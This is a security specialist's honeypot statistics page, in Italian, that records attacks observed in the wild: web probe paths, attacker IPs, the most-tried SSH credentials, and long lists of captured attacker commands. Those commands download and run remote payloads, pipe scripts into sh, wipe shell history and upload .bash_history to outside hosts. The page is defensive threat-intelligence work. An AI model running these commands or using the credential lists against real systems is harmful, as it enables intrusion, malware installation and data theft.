ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

WEB

×
LAST 20 (relevant) EVENTS
Timestamp Source
2016-04-22 00:18:56 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:18:08 66.249.66.73 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:15:41 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:12:26 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:11:31 66.249.66.79 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:09:44 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:06:29 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:05:11 66.249.66.73 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:02:12 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:02:11 66.249.66.39 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-22 00:00:50 207.46.13.193 United States
/
2016-04-21 23:58:41 66.249.66.39 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:57:44 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:55:36 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:53:31 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:53:27 216.244.79.218 United States
/cgi-bin/principal.php?filepath
2016-04-21 23:52:37 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:49:37 66.249.66.76 United States
/.br/file.php?showpage
2016-04-21 23:49:29 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:46:54 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
×
TOP 15 (attacker) IP
Connections Type Source
7045 sqli 113.106.106.131 China
4153 sqli 73.25.169.97 United States
3588 sqli 49.213.24.15 Singapore
3068 sqli 209.34.228.52 United States
3033 sqli 94.242.57.172 Russian Federation
2949 sqli 93.115.97.22 Romania
2946 sqli 125.161.33.242 Indonesia
1934 sqli 80.242.123.135 Bosnia and Herzegovina
1343 sqli 36.85.72.196 Indonesia
1088 sqli 107.167.178.81 United States
956 sqli 36.84.234.220 Indonesia
766 sqli 139.195.60.157 Indonesia
733 sqli 89.28.96.139 Moldova, Republic of
733 sqli 114.125.186.11 Indonesia
732 sqli 202.67.45.47 Indonesia
×
TOP 15 EXT
Count ext
6 log
5 txt
4 asp
4 ini
3 vmx
3 reg
3 nsf
2 vmdk
2 ldif
2 conf
2 dat
2 inc
2 gho
1 ccm
1 pqi
×
TOP 15 INTITLE
Count ext
41 index.of
27 Index Of
23 login
17 \\"Index
9 Index
8 admin
8 Novell
8 Welcome
6 ilohamail
5 intranet
5 DocuShare
5 PHP
4 Microsoft
4 EXTRANET
4 Remote
×
TOP 15 INTEXT
Count ext
8 parent directory
5 Subject
4 Warning:
3 gmail
3 appSettings
3 env.ini
3 Index of /
2 password
2 EZGuestbook
2 Fill
2 phpMyAdmin MySQL-Dump
2 nrg-
2 HTTP_FROM=googlebot
2 userid
2 Thank you for your order
×
TOP 15 INURL
Count ext
118730 /phpmanager/HTTP/newsticker_info.php
27481 /themes/vilisya/comments&%3Bsa%3DU&%3Bei%3DdekoU_CuGozr0QGQ4IDABw&%3Bved%3D0CCcQFjAC&%3Busg%3DAFQjCNFCTlDfdlRf3FTquEy1RYNOnmOJUA/main.php&%3Bsa%3DU&%3Bei%3D5Y67VOHfGMqWNpvbgPAD&%3Bved%3D0CGIQFjAP&%3Bu
18576 /includes/comments
10108 /admin/phpmyadmin/comments
8875 /checkout_confirmed.asp
8672 /robots.txt
8014 /comments
7491 /cpcommerce/comments
7425 /cgi-bin/comments
7045 /cgi-bin/promo.asp
5534 /wp-content/themes/striking/includes/comments
5220 /admin/HTTP/comments
4821 /ConnectComputer/order.asp
4798 /themes/vilisya/comments&%3Bsa%3DU&%3Bei%3DdekoU_CuGozr0QGQ4IDABw&%3Bved%3D0CCcQFjAC&%3Busg%3DAFQjCNFCTlDfdlRf3FTquEy1RYNOnmOJUA/wp-content/themes/vilisya/timthumb.php
4254 /phpMyAdmin-2.6.1-pl2/scripts/viewshowdetail.php

SSH

×
Last 50 commands executed
DateCommandSource
2016-11-21 18:14:36cd /tmp125.17.68.42 India
2016-11-21 18:14:36wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:14:36curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:14:36chmod 777 gtop.sh125.17.68.42 India
2016-11-21 18:14:36sh gtop.sh125.17.68.42 India
2016-11-21 18:14:36tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 18:14:36chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 18:14:36sh tftp1.sh125.17.68.42 India
2016-11-21 18:14:36tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 18:14:36chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 18:14:36sh tftp2.sh125.17.68.42 India
2016-11-21 18:14:36rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 18:14:36cd 125.17.68.42 India
2016-11-21 18:14:36rm -rf ./bash_history125.17.68.42 India
2016-11-21 18:14:36history -c125.17.68.42 India
2016-11-21 18:00:58cd /tmp125.17.68.42 India
2016-11-21 18:00:58wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:00:58curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:00:58chmod 777 gtop.sh125.17.68.42 India
2016-11-21 18:00:58sh gtop.sh125.17.68.42 India
2016-11-21 18:00:58tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 18:00:58chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 18:00:58sh tftp1.sh125.17.68.42 India
2016-11-21 18:00:58tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 18:00:58chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 18:00:58sh tftp2.sh125.17.68.42 India
2016-11-21 18:00:58rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 18:00:58cd 125.17.68.42 India
2016-11-21 18:00:58rm -rf ./bash_history125.17.68.42 India
2016-11-21 18:00:58history -c125.17.68.42 India
2016-11-21 17:54:58cd /tmp125.17.68.42 India
2016-11-21 17:54:58wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 17:54:58curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 17:54:58chmod 777 gtop.sh125.17.68.42 India
2016-11-21 17:54:58sh gtop.sh125.17.68.42 India
2016-11-21 17:54:58tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 17:54:58chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 17:54:58sh tftp1.sh125.17.68.42 India
2016-11-21 17:54:58tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 17:54:58chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 17:54:58sh tftp2.sh125.17.68.42 India
2016-11-21 17:54:58rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 17:54:58cd 125.17.68.42 India
2016-11-21 17:54:58rm -rf ./bash_history125.17.68.42 India
2016-11-21 17:54:58history -c125.17.68.42 India
2016-11-21 15:57:39ls -la /var/run/gcc.pid221.229.172.44 China
2016-11-21 15:57:38wget http://221.229.172.44:81/h8r9 chmod +x h8r9 ./h8r9221.229.172.44 China
2016-11-21 02:20:01cd /tmp125.17.68.42 India
2016-11-21 02:20:01wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 02:20:01curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
×
Last 20 sessions
DateSource
2016-11-23 21:59:00192.162.101.217 Russian Federation
2016-11-23 21:47:13125.17.68.42 India
2016-11-23 21:45:19125.17.68.42 India
2016-11-23 21:39:04193.124.128.5 Russian Federation
2016-11-23 21:38:1482.53.144.214 Italy
2016-11-23 21:35:2082.53.144.214 Italy
2016-11-23 21:34:1082.53.144.214 Italy
2016-11-23 21:33:53194.63.141.141 Russian Federation
2016-11-23 21:33:4382.53.144.214 Italy
2016-11-23 21:25:27194.63.141.141 Russian Federation
2016-11-23 21:24:3182.53.144.214 Italy
2016-11-23 21:23:345.196.76.41 France
2016-11-23 21:23:2782.53.144.214 Italy
2016-11-23 21:13:4382.53.144.214 Italy
2016-11-23 21:10:1882.53.144.214 Italy
2016-11-23 21:07:5382.53.144.214 Italy
2016-11-23 21:06:3882.53.144.214 Italy
2016-11-23 21:05:31123.31.35.40 Vietnam
2016-11-23 21:05:27123.31.35.40 Vietnam
2016-11-23 21:05:23123.31.35.40 Vietnam
×
TOP 15 USER+PASS
CountUsernamePassword
19002 adminadmin
11836 rootadmin
2812 rootroot
2283 root123456
2263 rootPassword
1613 root!@
1505 ubntubnt
1374 rootwubao
1324 rootjiamima
744 root12345
693 rootdefault
613 rootp@ssw0rd
591 supportsupport
584 root1234
519 rootabc123
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
2156195.88.209.38 Russian Federation
12395.39.222.159 Netherlands
1126195.88.208.44 Russian Federation
651140.130.203.58 Taiwan
495220.82.31.244 Korea, Republic of
258103.26.99.18 India
234195.154.183.162 France
230151.49.82.61 Italy
223183.3.202.187 China
220117.6.135.30 Vietnam
213185.63.255.91 Netherlands
182138.36.228.57 Brazil
17978.46.105.145 Germany
17878.46.112.3 Germany
17778.46.73.71 Germany
17678.46.114.99 Germany
171183.3.202.110 China
168116.31.116.26 China
16778.46.78.14 Germany
16778.46.109.180 Germany
×
TOP 20 attackers
ConnectionsSource
2758343.255.189.80 Hong Kong
1916943.255.189.31 Hong Kong
1115943.229.52.62 Hong Kong
9847221.229.172.103 China
8372103.41.124.16 Hong Kong
8118103.41.124.35 Hong Kong
799943.229.52.32 Hong Kong
7815103.41.124.20 Hong Kong
7771103.41.124.52 Hong Kong
7432103.41.124.41 Hong Kong
7016103.41.124.25 Hong Kong
6910116.31.116.26 China
6735103.41.124.13 Hong Kong
6720103.41.124.32 Hong Kong
6656103.41.124.53 Hong Kong
6649103.41.124.33 Hong Kong
6560103.41.124.56 Hong Kong
6460103.41.124.111 Hong Kong
6210103.41.124.28 Hong Kong
6179103.41.124.55 Hong Kong

MALWARE

× no file: honeypot/stats/mfiles.txt
×
Malicious Remote Files (SSH)
Wget Command
wget http://208.67.1.33/cats.sh
curl -O http://208.67.1.33/cats.sh
wget http://222.187.227.145:6654/xuxs
wget http://222.187.227.145:6654/sdas
wget http://222.187.227.145:6654/asd
wget http://198.167.140.29/gtop.sh
curl -O http://198.167.140.29/gtop.sh
wget http://212.59.112.214/gtop.sh
curl -O http://212.59.112.214/gtop.sh
wget -c http://103.56.115.43/Linux2.6
wget http://catsmeowalot.com/gtop.sh
curl -O http://catsmeowalot.com/gtop.sh
wget http://117.41.229.10:8989/Linux2.4
wget http://117.41.229.10:8989/linux-mips
wget http://117.41.229.10:8989/linux-arm
wget http://117.41.187.181:3322/sscy2.6
wget http://173.254.236.43:8090/Boot
wget http://173.254.236.43:8090/Aoot
wget http://202.28.120.32/gtop.sh
curl -O http://202.28.120.32/gtop.sh
wget -c http://118.193.24.106:7851/breeb
wget -c http://103.214.170.92:7788/breeb
wget http://104.223.17.52:3366/linzi64
wget http://104.223.17.52:3366/linzi32
wget http://94.192.118.63/kk.pl
wget http://103.55.178.55/kk.pl
wget http://118.193.233.83/kk.pl
wget http://118.193.233.83/gtop.sh
curl -O http://118.193.233.83/gtop.sh
wget -c http://t.cn/RcDPOu8
wget -c http://t.cn/RcDPxTU
wget http://58.221.66.146:8096/xiaom
wget http://103.56.113.122:9464/jrfs
wget http://103.56.113.122:9464/Lowr
wget http://103.55.178.55/gtop.sh
curl -O http://103.55.178.55/gtop.sh
wget http://107.161.89.181/h8r9 chmod +x h8r9 ./h8r9
wget -c http://222.186.51.168:7712/taiyo
wget -c http://222.186.51.168:7712/iuny
wget -c http://222.186.51.168:7712/ssbin
wget http://115.239.248.35:22/ddd1
wget http://115.239.248.35:22/bbbb
wget http://58.221.66.4:9250/wangzhe
wget http://58.221.66.4:9250/kuanshen
wget -q http://12.226.89.160/p.pl
wget http://221.229.172.44:81/g7d5 chmod +x g7d5 ./g7d5
wget -O /tmp/10771 http://103.56.112.178:1234/10771
wget http://5.189.186.3/bins.sh
wget http://104.223.10.160:81/f6ho chmod +x f6ho ./f6ho
wget -O /tmp/im.exe http://103.56.112.178:1234/im.exe
wget -c http://222.186.51.168:7712/vubin
wget -q http://catsmeowalot.com/p.pl
wget http://catsmeowalot.com/p.pl
wget http://12.226.89.160/gtop.sh
curl -O http://12.226.89.160/gtop.sh
wget http://103.56.112.178:1234/10771
wget http://103.56.112.178:1234/10991
wget -c http://222.186.51.168:7712/bubin
wget -q http://101.100.183.210/p.pl
wget http://101.100.183.210/gtop.sh
curl -O http://101.100.183.210/gtop.sh
wget http://103.56.112.178:1234/xudp
wget http://103.56.112.178:1234/Linux2.6
wget -O /tmp/xudp http://103.56.112.178:1234/xudp
wget -O /tmp/Manager http://103.56.115.43/Manager
wget http://222.186.130.205:9999/aaaaa
wget http://222.186.130.205:9999/2222
wget http://222.186.130.205:6666/4444
wget http://222.186.130.205:6666/1111
wget http://222.186.130.205:6666/3333
wget http://180.97.237.42:3311/Linux2.6
wget http://180.97.237.42:3311/33333333.exe
wget http://104.223.10.160:81/e38sd chmod +x e38sd ./e38sd
wget http://222.186.130.205:6666/2222
wget -c -P /tmp http://182.161.39.77:1/xxj
curl -O http://212.154.211.81/ssh.txt
wget http://212.154.211.81/ssh.txt
wget http://202.102.72.217:59510/shyadmin
wget http://198.55.114.226:8080/dg66
wget -O /tmp/shyadmin http://202.102.72.217:59510/shyadmin
wget -c http://61.188.39.15:3431/LIVE8
wget -c http://202.102.72.217:59510/shyadmin
wget http://104.129.35.3:81/i9os chmod +x i9os ./i9os
wget -c http://103.56.115.43/Linux2.4
wget http://115.239.248.35:1/bbbb
wget http://115.239.248.35:1/ddd1
wget http://115.239.248.35:1/110
wget http://115.239.248.35:1/jjxx
wget http://115.239.248.35:1/xxjj
wget -O /tmp/Say_25000 http://211.127.220.60:809/Say_25000
wget http://198.55.114.226:8080/Dg520
wget -O /tmp/xp http://59.56.111.136:6666/xp
wget http://115.239.248.54:3/host1
wget http://115.239.248.54:2/clown
wget http://183.60.111.83/sadsa
wget http://115.239.248.53:123/XX00
wget http://115.239.248.53:123/00XX
wget -O /tmp/xp http://115.159.83.49:8888/xp
wget -c http://180.178.55.106:50668/beeb
wget -c http://180.178.55.106:50668/ces
wget -O /tmp/mo http://42.51.217.2:1998/mo
wget http://115.239.248.50:1/wa
wget http://115.239.248.50:1/aw
wget http://115.239.248.35:1/nnnn
wget http://222.186.3.97:5953/ludp
wget http://222.186.3.97:5953/lsyn
wget http://155.94.161.147:81/g7d5 chmod +x g7d5 ./g7d5
wget -c http://211.155.229.230:5198/chao
wget -c http://115.231.218.173:9534/dwm
wget http://115.239.248.50:1/ces
wget -c http://211.155.229.230:5198/ces
wget http://218.2.0.155:5569/ma123
wget http://115.239.248.35:1/kkd
wget -c http://115.239.248.35:1/kkd
wget -c http://115.239.248.35:1/kkf
wget -c -P /tmp http://115.239.248.35:1/kkd
wget -c -P /tmp http://115.239.248.35:1/kkf
wget http://218.2.0.127:5569/ttp
wget http://36.251.184.196:32156/ss1
wget http://115.239.248.50:1/mmmm
wget -c http://36.251.184.196:32156/ss1
wget http://115.239.248.50:31232/mmmm
wget -c http://115.230.126.82:11315/u1
wget -O /tmp/ntpd http://obuwzh17v.bkt.clouddn.com/ntpd
wget http://115.239.248.35:777/Vo
wget http://115.239.248.50:3234/mmmm
wget http://115.239.248.50:3234/qqb
wget http://115.239.248.50:3234/qqc
wget -c http://115.231.220.21:31589/u1
wget http://115.239.248.50:12312/mmmm
wget http://115.239.248.50:3322/mmmm
wget http://115.239.248.50:3322/java
wget -O /tmp/etc168 http://113.107.249.213:8081/etc168
wget http://222.186.11.70:8099/Linux-udp43145
wget http://222.186.11.70:8099/Linux-syn43145
wget http://45.114.129.76:876/yxhl
wget http://103.40.102.2:8090/udp
wget http://115.238.237.76:8080/zgvk123.0
wget http://221.229.172.44:81/i37rj chmod +x i37rj ./i37rj
wget http://183.131.83.245:642/wi
wget -c http://211.155.229.230:5198/rwd
wget http://59.63.166.70:81/f6ho chmod +x f6ho ./f6ho
wget http://221.229.172.44:81/f6ho chmod +x f6ho ./f6ho
wget http://183.131.83.245:642/mms
cd /usr/bin/wget chmod 0755 wget
wget -O /tmp/bin.sh http://115.159.83.49:8888/bin.sh
wget http://221.229.172.44:81/h8r9 chmod +x h8r9 ./h8r9
wget http://59.63.166.70:81/h8r9 chmod +x h8r9 ./h8r9
wget -c http://211.155.229.230:5198/aiai
wget -c http://211.155.229.230:5198/breeb
wget http://42.51.22.219/qweasd
wget -O /tmp/OG http://118.193.143.112:5060/OG
wget http://183.203.9.179:6667/mohan
wget http://118.193.143.112:5060/OG
wget -c http://47.89.24.181:8083/kuaikai
wget -O /tmp/g250 http://23.234.25.140:15828/g250
wget http://118.193.143.112:5060/DDos
wget -c http://115.231.217.109:11315/c33
wget -c http://115.231.217.109:11315/c32
wget http://115.239.248.72:12311/sarm
wget http://222.186.24.168:687/ttp
wget -c http://222.186.58.176:279/mmt
wget http://59.63.166.70:81/e38sd chmod +x e38sd ./e38sd
wget http://114.80.116.202:6667/mohan2.6
wget http://115.231.218.206:8080/qwert
wget http://101.200.139.74:258/kan21
wget http://101.200.139.74:258/66
wget -O /tmp/niuniu http://23.234.25.140:15828/niuniu
wget http://59.63.166.70:81/g7d5 chmod +x g7d5 ./g7d5
wget -c http://222.186.10.105:1022/xb132
wget -c http://222.186.10.105:1022/xb164
wget http://115.239.248.72:12311/aaoo
wget http://222.187.253.29:321/920.exe
wget http://222.186.11.70:8091/Linux-udp43145
wget http://222.186.11.70:8091/Linux-syn43145
wget -O /tmp/Linux2.4 http://104.223.6.246:5898/Linux2.4
wget -c http://222.186.10.105:1022/xb64
wget -c http://222.186.10.105:1022/xb32
wget -c http://222.186.10.105:1022/xbjj.1
wget -qO - http://192.210.237.210/x/2sh
wget -O /tmp/server http://115.239.248.72:123/server
wget http://183.203.9.179:6667/mohan2.6
wget http://114.80.116.202:6667/mohan
wget http://221.229.172.44:81/e38sd chmod +x e38sd ./e38sd
wget http://59.63.166.70:81/l39ac chmod +x l39ac ./l39ac
wget http://221.229.172.44:81/l39ac chmod +x l39ac ./l39ac
curl http://192.210.237.210/x/3sh
wget -qO - http://192.210.237.210/x/1sh
wget -c http://192.210.237.210/x/1sh -P /var/run
wget -qO /root/- http://192.210.237.210/x/2sh
wget -c http://192.210.237.210/x/2sh -P /tmp
wget http://221.229.172.44:81/s36oa chmod +x s36oa ./s36oa
wget -c http://115.239.248.72:123/qbqb
wget http://116.255.129.183/svshost.exe
wget http://221.229.172.44:81/i9os chmod +x i9os ./i9os
wget http://59.63.166.70:81/i9os chmod +x i9os ./i9os
wget http://116.255.129.183/tyui2.4
wget http://115.239.248.72:321/cesi
wget -c http://115.239.248.72:321/1.exe
wget http://115.239.248.72:321/1.exe
wget http://222.187.253.29:221/2299
wget http://116.255.129.183/tyui2.6
wget http://222.187.224.25:65432/55555
wget http://115.239.248.72:123/2299
wget http://14.17.115.54/tyui2.4
wget http://58.221.65.47:1144/Linux2.6cycy
wget http://58.221.65.47:1144/Linux2.4cycy
wget -O /tmp/Linux2.6 http://222.186.34.222:10086/Linux2.6
wget http://14.17.115.54/haha0987
wget http://14.17.115.54/tyui2.6
wget http://14.17.115.54/ikmj-arm
wget http://115.239.248.72:123/2299
wget http://124.231.136.248:687/wwe
wget http://14.17.115.54/ikmj-arm
wget http://114.55.41.239:81/123.rar
wget http://222.186.34.73:5566/Linu
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://221.229.172.44:81/g7d5 chmod +x g7d5 ./g7d5
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.223.11.102/g7d5 chmod +x g7d5 ./g7d5
wget http://14.17.115.54/Ludp25
wget http://14.17.115.54/mwmv782
wget http://14.17.115.54/mmmn009
wget http://14.17.115.54/mmmn008
wget http://14.17.115.54/mmmn007
wget http://119.61.18.182/mmmn007
wget -O /tmp/sys http://180.97.239.10:999/sys
wget -c http://103.232.89.227:5198/rwd
wget -c http://103.232.89.227:5198/breeb
wget manumtb.3x.ro/ManuMtb
wget http://123.249.3.193/dfgh881
wget -c http://103.20.249.191:5198/breeb
wget -O /tmp/sys http://104.148.61.195:280/sys
wget -c http://218.2.0.111:397/TAB
wget http://124.231.136.248:687/ss
wget -O /tmp/zx http://23.234.25.140:15828/zx
wget http://212.154.211.81/j.txt
curl -O http://212.154.211.81/j.txt
wget -c http://222.133.11.46:8080/udp
wget -c http://222.133.11.46:8080/000
wget http://115.231.222.116:1522/skkz
wget http://45.35.52.222:4455/Linu
curl http://192.210.237.210/x/3sh | sh
wget -qO - http://192.210.237.210/x/2sh | sh > /dev/null 2 >& 1 &
wget -c http://192.210.237.210/x/2sh -P /tmp
wget -qO - http://192.210.237.210/x/1sh | sh > /dev/null 2 >& 1 &
wget -c http://192.210.237.210/x/1sh -P /var/run
wget -O /tmp/haha http://222.186.56.69:8667/haha
wget -O /tmp/usrm http://aam.oss-cn-hangzhou.aliyuncs.com/usrm
wget -O /tmp/g251 http://23.234.25.140:15828/g251
wget -c http://104.148.61.35:6332/dd-wrt
wget http://119.29.233.48:5088/ss
wget http://115.239.230.223:8888/tes2
wget http://115.159.208.50:123/1.sh
wget -O /tmp/2500 http://115.231.218.37:44555/2500
wget -O /tmp/25002 http://222.186.34.70:15826/25002
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin unset HISTFILE HISTLOG HISTORY HISTFILE=/dev/null HISTSIZE=0 cd /bin/ wget http://69.197.175.253/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc good http://69.197.175.253/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc sleep 2 mv /usr/bin/wget /usr/bin/good mv /bin/wget /bin/good ls -la /etc/daemon.cfg exit 0
wget http://45.34.191.131:8080/ccd
wget http://222.187.254.78:8081/fuyan
wget http://222.187.254.78:8081/fuyan1
wget http://115.239.230.223:8881/s12k
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin unset HISTFILE HISTLOG HISTORY HISTFILE=/dev/null HISTSIZE=0 cd /bin/ wget http://173.208.219.116/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc good http://173.208.219.116/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc sleep 2 mv /usr/bin/wget /usr/bin/good mv /bin/wget /bin/good ls -la /etc/daemon.cfg exit 0
wget http://115.239.230.223:9999/vc2008z
wget http://115.239.230.223:9999/akjavc
wget http://115.239.230.223:9999/yao1
wget -c http://122.0.80.183:5198/rwd
wget -c http://122.0.80.183:5198/breeb
wget -qO - http://52.8.123.250/x/1sh | sh > /dev/null 2 >& 1 &
wget -c http://52.8.123.250/x/1sh -P /var/run
wget http://115.239.230.223:8881/kjkkkz
wget http : //115.239.230.223 : 3388/jdlsamjl
wget http : //115.239.230.223 : 8881/tusz
wget http : //116.255.171.20 : 321/Cesi
wget http : //116.255.171.20 : 321/scan
wget http : //116.255.171.20 : 8080/Sqfq
wget http : //192.184.40.82 : 8185/arm
wget http : //222.186.52.82 : 4080/Linx
wget http : //192.184.40.82 : 8185/ux2.6
curl -o /tmp/linux http : //23.234.25.140 : 15826/linux
wget http : //183.131.83.179 : 4080/Linsyn
wget http : //192.184.40.82 : 4233/xff
wget http : //222.186.30.246 : 9966/syndo1
wget http : //222.186.52.82 : 5566/netdos
wget http : //120.25.125.68 : 3322/netdos
curl -o /tmp/u251 http : //222.186.21.201 : 2014/u251
wget http://58.211.16.74:2/
wget http://58.211.16.74:2/xudp
curl -o /tmp/u251 http://222.186.21.201:2014/u251
curl -o /tmp/3.1415926 http://23.234.25.140:15826/3.1415926
curl http://121.40.175.22:15651/95 -o /tmp/gfty
curl -o /tmp/007 http://23.234.25.140:15826/007
curl -o /tmp/gpf http://23.234.25.140:15826/gpf
curl -o /tmp/1 http://23.234.25.140:15826/1
wget -P/root/ http://39.109.4.162/escds
curl -o /tmp/162 http://23.234.25.140:15826/162
wget -O /tmp/jweq http://222.186.56.5:801/jweq
wget -O /tmp/jweb http://222.186.56.5:801/jweb
wget -O /tmp/Client http://222.186.34.203:89/Client
wget -O /tmp/chinasyn http://222.186.34.203:89/chinasyn
wget -O /tmp/Someone915 http://222.186.34.203:89/Someone915
wget -O /tmp/bs http://222.186.34.203:88/bs
wget -O /tmp/sb http://222.186.34.203:88/sb
wget -O /tmp/Linux1992 http://222.186.34.203:88/Linux1992
wget -O /root/SingForYou http://222.186.34.203:88/SingForYou
wget -O /tmp/SingForYou http://222.186.34.203:88/SingForYou
curl -F "filename=@/tmp/0001z" http://222.186.31.181:8808/1/
curl -F "filename=@.bash_history" http://222.186.31.181:8808/1/
wget http://wwjj.keyipin.com/3e.exe
wget http://222.186.42.46:6989/1ca.rar
wget http://wwjj.keyipin.com/4e.exe
wget http://222.186.31.181:0218/hdksyn8
curl -o /tmp/25002 http://23.234.25.140:15826/25002
wget http://wwjj.keyipin.com/syn.zip
wget http://wwjj.keyipin.com/2e.exe
wget http://wwjj.keyipin.com/1e.exe
wget http://222.186.30.119:1/2.exe
wget http://222.186.30.119:1/1.exe
wget http://222.186.30.119:1/1e
wget http://wwjj.keyipin.com/12e.zip
wget -c http://61.147.107.109:7531/erepc
wget http://wwjj.keyipin.com/cs.rar
wget -c http://61.147.107.109:7531/fsta
wget http://222.186.30.160:1/ar.zip
wget http://appdown.keyipin.com/ScanB.zip
wget -c http://208.87.241.145:1000/images/sff
wget -c http://www.kudh.net/upload/pic/sff
wget -c http://108.186.146.232:8901/sff
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1 &
wget -c http://104.199.135.124/bbsh -P /var/run
wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>&1 &
wget -c http://104.199.135.124/wgsh -P /tmp
wget -c http://jlcampus.cn/images/sff
wget http://111.73.46.214:885/b58858
wget http://111.73.46.214:885/a58858
wget -c http://222.186.59.91:65530/ssss
wget -c http://222.186.59.91:65529/ssss
wget -c http://222.186.59.91:6585/ssfff
do (wget -O $filename $list$filename || curl -o $filename $list$filename)
wget http://23.234.19.202/i/a08
wget -c http://222.186.59.91:6585/fisdo
wget http://104.143.5.13/i/a09.zip
wget http://104.143.5.13/i/a07.zip
wget http://nginx.org/download/nginx-1.6.2.tar.gz
wget -c http://www.sudi88.com/forms/font/sff
wget -c http://222.186.59.91:14552/sndddd
wget http://185.11.144.190/gb.sh
wget -c http://61.160.212.59:880/likds
wget -c http://61.160.212.59:880/32ouk
wget -c http://61.160.212.59:880/64rth
wget http://198.15.234.66/i/a06.zip
wget http://198.15.234.66/i/a09.zip
wget http://114.80.215.201:9527/TX981
wget http://38.68.17.37/i/a06.zip
wget http://198.15.234.66/i/a07.zip
wget -c http://222.186.59.91:14552/sfssfgg
wget -c http://222.186.59.91:14552/snddd
wget -c http://222.186.59.91:14552/sndd
wget -c http://222.186.59.91:52521/sndd
wget -c http://222.186.59.91:51855/asud
wget -c http://61.160.232.140:8000/aa
wget -c http://103.42.14.27:3584/fsag
wget -c http://103.42.14.27:3584/sfsfg
wget -c http://222.186.21.82:7589/xiao
wget -c http://222.186.57.11:6566/os
wget -c http://222.186.21.82:4568/xiao
wget -c http://118.193.241.19:695/syn1
wget -c http://118.193.241.19:695/udp1
wget -c http://216.99.151.186:7888/dao
wget -c http://222.186.190.157:8080/DDos
wget -c http://www.jlcampus.cn/images/sff
wget -c http://222.186.57.11:9965/123
wget -c http://222.186.59.91:8547/ddddd
wget -c http://222.186.59.91:8547/ssss
wget -c http://222.186.26.133:82/sff
wget -c http://199.83.94.89:7888/fuck
wget -c http://222.186.26.132:82/sff
wget -c http://222.186.26.133:81/sff
wget -c http://69.163.33.138:81/jjj
wget -c http://199.83.94.89:7888/wa
wget -c http://69.163.33.138:81/sff
wget http://60.190.216.221:999/DDos38
wget http://111.73.46.22:8080/8x
wget http://111.73.46.22:8080/cccc
wget -c http://103.228.130.151:82/yes
wget -c http://61.164.126.5:81/rss
wget -P/root/ http://107.150.63.178:88/disk
wget -c http://61.164.126.5:7401/sys
wget -c http://223.68.154.214:9191/159
